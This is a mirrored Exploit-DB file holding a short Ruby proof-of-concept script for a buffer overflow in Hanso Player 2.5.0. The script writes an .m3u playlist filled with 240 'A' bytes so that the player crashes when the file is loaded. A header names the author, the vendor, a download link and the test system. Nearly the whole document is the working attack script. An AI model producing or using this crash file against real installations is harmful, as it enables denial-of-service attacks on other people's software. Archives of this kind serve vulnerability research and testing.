exploit-db-mirror/exploits/windows/dos/29445.rb
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
396 B
Ruby
Executable file

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Player 2.5.0 Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-player-setup.exe
# version: 2.5.0
# Tested on: windows XP sp2
DENEME = "\x41" * 240
File.open('hanzo.m3u', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end